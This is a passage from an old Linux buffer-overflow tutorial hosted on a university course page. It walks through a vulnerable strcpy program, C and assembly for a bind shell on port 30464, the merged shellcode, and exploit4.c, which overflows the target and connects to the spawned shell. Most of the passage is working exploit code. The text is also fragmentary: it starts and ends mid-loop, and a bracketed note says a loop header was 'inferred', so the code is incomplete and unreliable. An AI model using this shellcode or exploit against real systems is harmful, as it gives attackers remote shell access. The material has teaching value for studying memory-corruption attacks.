	for(i=0;i<bsize;i+=4)
	{
		buff[i+ALIGN]=(addr&0x000000ff);
		buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

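	for(i=0;i
	/* [The rest of exploit3.c is missing from this copy.]   */
----------------------------------------------------------------------------

[The opening of section 6, through the first lines of vulnerable4.c, is
missing from this copy.]

vulnerable4.c
----------------------------------------------------------------------------
#include <string.h>
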
int main(int argc,char **argv)
{
	char buffer[1024];
	if(argc>1)
		strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------

 This is a standard vulnerable program. I will use it for the socket-opening
buffer overflow because I am too lazy to write an example daemon program. :)
However, after you see the code, you will not be disappointed.
 
6.2 Make open socket code
 If you can execute the code below, you can open a socket.

opensocketasm1.c
----------------------------------------------------------------------------
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc,cli,soc_len;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;

int main()
{
	if(fork()==0)
	{
		serv_addr.sin_family=AF_INET;
		serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
		serv_addr.sin_port=htons(30464);
		soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
		bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
		listen(soc,1);
		soc_len=sizeof(cli_addr);
		cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
		dup2(cli,0);
		dup2(cli,1);
		dup2(cli,2);
		execl("/bin/sh","sh",0);
	}
}
----------------------------------------------------------------------------

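 This is difficult to write in assembly language, so simplify the program
first. The version below replaces the symbolic constants with their numeric
values and passes null pointers to accept().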

opensocketasm2.c
----------------------------------------------------------------------------
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc,cli;
struct sockaddr_in serv_addr;

int main()
{
	if(fork()==0)
	{
		serv_addr.sin_family=2;
		serv_addr.sin_addr.s_addr=0;
		serv_addr.sin_port=0x77;
		soc=socket(2,1,6);
		bind(soc,(struct sockaddr *)&serv_addr,0x10);
		listen(soc,1);
		cli=accept(soc,0,0);
		dup2(cli,0);
		dup2(cli,1);
		dup2(cli,2);
		execl("/bin/sh","sh",0);
	}
}
----------------------------------------------------------------------------

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c
[ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble fork
Dump of assembler code for function fork:
0x804ca90 <fork>:       movl   $0x2,%eax
0x804ca95 <fork+5>:     int    $0x80
0x804ca97 <fork+7>:     cmpl   $0xfffff001,%eax
0x804ca9c <fork+12>:    jae    0x804cdc0 <__syscall_error>
0x804caa2 <fork+18>:    ret
0x804caa3 <fork+19>:    nop
0x804caa4 <fork+20>:    nop
0x804caa5 <fork+21>:    nop
0x804caa6 <fork+22>:    nop
0x804caa7 <fork+23>:    nop
0x804caa8 <fork+24>:    nop
0x804caa9 <fork+25>:    nop
0x804caaa <fork+26>:    nop
0x804caab <fork+27>:    nop
0x804caac <fork+28>:    nop
0x804caad <fork+29>:    nop
0x804caae <fork+30>:    nop
0x804caaf <fork+31>:    nop
End of assembler dump.
(gdb) disassemble socket
Dump of assembler code for function socket:
0x804cda0 <socket>:     movl   %ebx,%edx
0x804cda2 <socket+2>:   movl   $0x66,%eax
0x804cda7 <socket+7>:   movl   $0x1,%ebx
0x804cdac <socket+12>:  leal   0x4(%esp,1),%ecx
0x804cdb0 <socket+16>:  int    $0x80
0x804cdb2 <socket+18>:  movl   %edx,%ebx
0x804cdb4 <socket+20>:  cmpl   $0xffffff83,%eax
0x804cdb7 <socket+23>:  jae    0x804cdc0 <__syscall_error>
0x804cdbd <socket+29>:  ret
0x804cdbe <socket+30>:  nop
0x804cdbf <socket+31>:  nop
End of assembler dump.
(gdb) disassemble bind
Dump of assembler code for function bind:
0x804cd60 <bind>:       movl   %ebx,%edx
0x804cd62 <bind+2>:     movl   $0x66,%eax
0x804cd67 <bind+7>:     movl   $0x2,%ebx
0x804cd6c <bind+12>:    leal   0x4(%esp,1),%ecx
0x804cd70 <bind+16>:    int    $0x80
0x804cd72 <bind+18>:    movl   %edx,%ebx
0x804cd74 <bind+20>:    cmpl   $0xffffff83,%eax
0x804cd77 <bind+23>:    jae    0x804cdc0 <__syscall_error>
0x804cd7d <bind+29>:    ret
0x804cd7e <bind+30>:    nop
0x804cd7f <bind+31>:    nop
End of assembler dump.
(gdb) disassemble listen
Dump of assembler code for function listen:
0x804cd80 <listen>:     movl   %ebx,%edx
0x804cd82 <listen+2>:   movl   $0x66,%eax
0x804cd87 <listen+7>:   movl   $0x4,%ebx
0x804cd8c <listen+12>:  leal   0x4(%esp,1),%ecx
0x804cd90 <listen+16>:  int    $0x80
0x804cd92 <listen+18>:  movl   %edx,%ebx
0x804cd94 <listen+20>:  cmpl   $0xffffff83,%eax
0x804cd97 <listen+23>:  jae    0x804cdc0 <__syscall_error>
0x804cd9d <listen+29>:  ret
0x804cd9e <listen+30>:  nop
0x804cd9f <listen+31>:  nop
End of assembler dump.
(gdb) disassemble accept
Dump of assembler code for function __accept:
0x804cd40 <__accept>:   movl   %ebx,%edx
0x804cd42 <__accept+2>: movl   $0x66,%eax
0x804cd47 <__accept+7>: movl   $0x5,%ebx
0x804cd4c <__accept+12>:        leal   0x4(%esp,1),%ecx
0x804cd50 <__accept+16>:        int    $0x80
0x804cd52 <__accept+18>:        movl   %edx,%ebx
0x804cd54 <__accept+20>:        cmpl   $0xffffff83,%eax
0x804cd57 <__accept+23>:        jae    0x804cdc0 <__syscall_error>
0x804cd5d <__accept+29>:        ret    
0x804cd5e <__accept+30>:        nop    
0x804cd5f <__accept+31>:        nop    
End of assembler dump.
(gdb) disassemble dup2  
Dump of assembler code for function dup2:
0x804cbe0 <dup2>:       movl   %ebx,%edx
0x804cbe2 <dup2+2>:     movl   0x8(%esp,1),%ecx
0x804cbe6 <dup2+6>:     movl   0x4(%esp,1),%ebx
0x804cbea <dup2+10>:    movl   $0x3f,%eax
0x804cbef <dup2+15>:    int    $0x80
0x804cbf1 <dup2+17>:    movl   %edx,%ebx
0x804cbf3 <dup2+19>:    cmpl   $0xfffff001,%eax
0x804cbf8 <dup2+24>:    jae    0x804cdc0 <__syscall_error>
0x804cbfe <dup2+30>:    ret
0x804cbff <dup2+31>:    nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------

fork(); code
----------------------------------------------------------------------------
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

socket(2,1,6); code
----------------------------------------------------------------------------
	/* %ecx is a pointer of all arguments.                   */
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	/* The first argument.                                   */
	/* %esi has to reference free memory space before this   */
	/* instruction.                                          */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* The second argument.                                  */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	/* The third argument.                                   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

bind(soc,(struct sockaddr *)&serv_addr,0x10); code
----------------------------------------------------------------------------
	/* %ecx is a pointer of all arguments.                   */
char code[]=
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	/* %eax has to have soc value before using this          */
	/* instruction.                                          */
	/* the first argument.                                   */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
	/* serv_addr.sin_family=2                                */
	/* 2 is stored at 0xc(%esi).                             */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
	/* store port number at 0xe(%esi)                        */
	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	/* %eax = the address of serv_addr                       */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* the second argument.                                  */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	/* serv_addr.sin_addr.s_addr=0                           */
	/* 0 is stored at 0x10(%esi).                            */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	/* the third argument.                                   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

listen(soc,1); code
----------------------------------------------------------------------------
	/* %ecx is a pointer of all arguments.                   */
char code[]=
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	/* %eax has to have soc value before using this          */
	/* instruction.                                          */
	/* the first argument.                                   */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* the second argument.                                  */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

accept(soc,0,0); code
----------------------------------------------------------------------------
	/* %ecx points to the argument array.                    */
char code[]=
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	/* %eax has to have soc value before using this          */
	/* instruction.                                          */
	/* the first argument.                                   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* the second argument.                                  */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	/* the third argument.                                   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

dup2(cli,0); code
----------------------------------------------------------------------------
	/* the first argument is %ebx and the second argument    */
	/* is %ecx                                               */
char code[]=
	/* %eax has to have cli value before using this          */
	/* instruction.                                          */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

6.3 Modify the normal shellcode

 Merging the code fragments above takes some work.

new shellcode
----------------------------------------------------------------------------
char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80"                      /* int $0x80             */
	"\x85\xc0"                      /* testl %eax,%eax       */
	"\x75\x43"                      /* jne 0x43              */
	/* fork()!=0 case                                        */
	/* The parent calls exit(0). It takes two jumps to get   */
	/* there because exit(0) is located too far away.        */
	"\xeb\x43"                      /* jmp 0x43              */
	/* fork()==0 case                                        */
	/* The child goes to the call -0xa5 instruction. It      */
	/* takes two jumps because that call is located too far  */
	/* away.                                                 */
	"\x5e"                          /* popl %esi             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x04"                      /* jmp 0x4               */
	"\xeb\x55"                      /* jmp 0x55              */
	"\xeb\x5b"                      /* jmp 0x5b              */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x01"                      /* movb $0x1,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x02"                      /* movb $0x2,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
	/* %eax="/bin"                                           */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
	/* %eax="/sh/"                                           */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\x5b\xff\xff\xff";         /* call -0xa5            */
----------------------------------------------------------------------------

6.4  Exploit vulnerable4 program
 With this shellcode, writing the exploit code is straightforward. You also
have to write code that connects to the socket.

exploit4.c
----------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80"                      /* int $0x80             */
	"\x85\xc0"                      /* testl %eax,%eax       */
	"\x75\x43"                      /* jne 0x43              */
	"\xeb\x43"                      /* jmp 0x43              */
	"\x5e"                          /* popl %esi             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x04"                      /* jmp 0x4               */
	"\xeb\x55"                      /* jmp 0x55              */
	"\xeb\x5b"                      /* jmp 0x5b              */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x01"                      /* movb $0x1,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x02"                      /* movb $0x2,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\x5b\xff\xff\xff";         /* call -0xa5            */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

long getip(char *name)
{
	struct hostent *hp;
	long ip;
	if((ip=inet_addr(name))==-1)
	{
		if((hp=gethostbyname(name))==NULL)
		{
			fprintf(stderr,"Can't resolve host.\n");
			exit(0);
		}
		memcpy(&ip,(hp->h_addr),4);
	}
	return ip;
}

int exec_sh(int sockfd)
{
	char snd[4096],rcv[4096];
	fd_set rset;
	while(1)
	{
		FD_ZERO(&rset);
		FD_SET(fileno(stdin),&rset);
		FD_SET(sockfd,&rset);
		select(255,&rset,NULL,NULL,NULL);
		if(FD_ISSET(fileno(stdin),&rset))
		{
			memset(snd,0,sizeof(snd));
			fgets(snd,sizeof(snd),stdin);
			write(sockfd,snd,strlen(snd));
		}
		if(FD_ISSET(sockfd,&rset))
		{
			memset(rcv,0,sizeof(rcv));
			if(read(sockfd,rcv,sizeof(rcv))<=0)
				exit(0);
			fputs(rcv,stdout);
		}
	}
}

int connect_sh(long ip)
{
	int sockfd,i;
	struct sockaddr_in sin;
	printf("Connect to the shell\n");
	fflush(stdout);
	memset(&sin,0,sizeof(sin));
	sin.sin_family=AF_INET;
	sin.sin_port=htons(30464);
	sin.sin_addr.s_addr=ip;
	if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("Can't create socket\n");
		exit(0);
	}
	if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
	{
		printf("Can't connect to the shell\n");
		exit(0);
	}
	return sockfd;
}

void main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;
	int sockfd;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

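	/* loop header and first assignment inferred from the surviving lines */
	for(i=0;i<bsize;i+=4)
	{
		buff[i+ALIGN]=(addr&0x000000ff);
		buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;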
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

	for(i=0;i


© 2002 T. P. Baker & Florida State University. No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means without written permission. (Last updated by $Author: cop4610 $ on $Date: 2002/09/02 20:27:19 $.)